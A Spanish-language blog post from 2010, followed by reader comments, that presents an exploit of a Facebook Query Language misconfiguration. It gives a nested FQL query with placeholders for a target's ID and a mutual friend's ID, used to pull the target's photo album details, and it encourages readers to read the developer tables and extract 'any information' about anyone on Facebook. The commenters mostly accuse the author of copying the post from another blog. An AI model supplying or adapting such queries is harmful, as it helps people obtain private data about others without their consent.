| Mobile| RSS

FQL (Facebook Query Language) Nos Hace Vulnerables.

miércoles, 13 de enero de 2010 | Tags: | 5 Comentarios



Leyendo Segu-info me encontre con la noticia de que habia un problema en la configuracion de FQL (Facebook Query Language) entonces dije si el problema existe tengo que averiguar como se puede acceder a dicho contenido.
Vos a hacer un comentario que no tiene mucho que ver o tal vez si, hace poco una amiga hizo algo similar pero sin conocimientos informaticos, todo basado en la herramienta mas grande que poseemos los seres humanos (nuestro cerebro), alta ingeria social aplico ;) .

Hecho el corolario pasemos a ver como podemos utilizar esta falla de configuracion a nuestro favor:

Con el siguiente codigo podremos obtener informacion de cualquier persona de facebook, con tan solo ser usuario standar (estar registrados :P).

select
aid,
cover_pid,
name,
created,
description,
location,
size,
link,
visible,
type
from
album
where
owner
in
(
select
uid1
from
friend
where
uid1 = [ID FACEBOOK A VULNERAR]
and
uid2
in
(
select
uid1,
uid2
from
friend
where
uid1 = [MI ID DE FACEBOOK]
and
(
uid2 = [ID DE MI AMIGO]
or
uid1 = [ID DE MI AMIGO]
)
)
)

ahora si prestan atencion en la imagen:

Se puede apreciar lo que remarque a las izquierda, para que ustedes pongan de la misma forma y asi poder obtener los datos del id a investigar 
:)
En este caso vemos su album de fotos, pero si siguen investigando, pueden conseguir cualquier informacion.

Si alguien quiere las tablas de facebook.com aqui estan:http://wiki.developers.facebook.com/index.php/FQL_Tables
Solo es cuestion de leer un poquito mas para obtener otros datos
Fuente http://www.delincuentedigital.com.ar

5 Respondiendo
gravatar
Darioxhcx
on 17 de enero de 2010, 2:43  

che.. solo te falto el __EOF__

jajaja...

gravatar
blogTEU-Informatico
on 17 de enero de 2010, 12:47  

ufffff entre a tu blog esta muy interesante

gravatar
Darioxhcx
on 18 de enero de 2010, 18:23  

si no entendiste mi primer comentario es por que algo no te carbura bien...

http://www.delincuentedigital.com.ar/2010/01/fql-facebook-query-language-nos-hace-vulnerables.aspx

solo te falto el __EOF__ , es un copy y paste..
lo peor de todo nunca pusiste la fuente , pero lo mas desagradable es que no tubiste ni el atrevimiento de cambiar nada de nada... ni de opinar sobre la entrada...

entenderas este comentario o vas a necesitar una breve explicacion ? avisame , asi hago un video entonces..

gravatar
blogTEU-Informatico
on 19 de enero de 2010, 10:43  

ok ya entendí.. lo soluciono ahora

gravatar
Anónimo
on 7 de enero de 2013, 12:52  

hola! es posible que al pasar unos años esto haya cambiado? porque entro y tengo otras opciones y no encuentro las de la imagen . Por favor si me podes ayudar!

Publicar un comentario

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter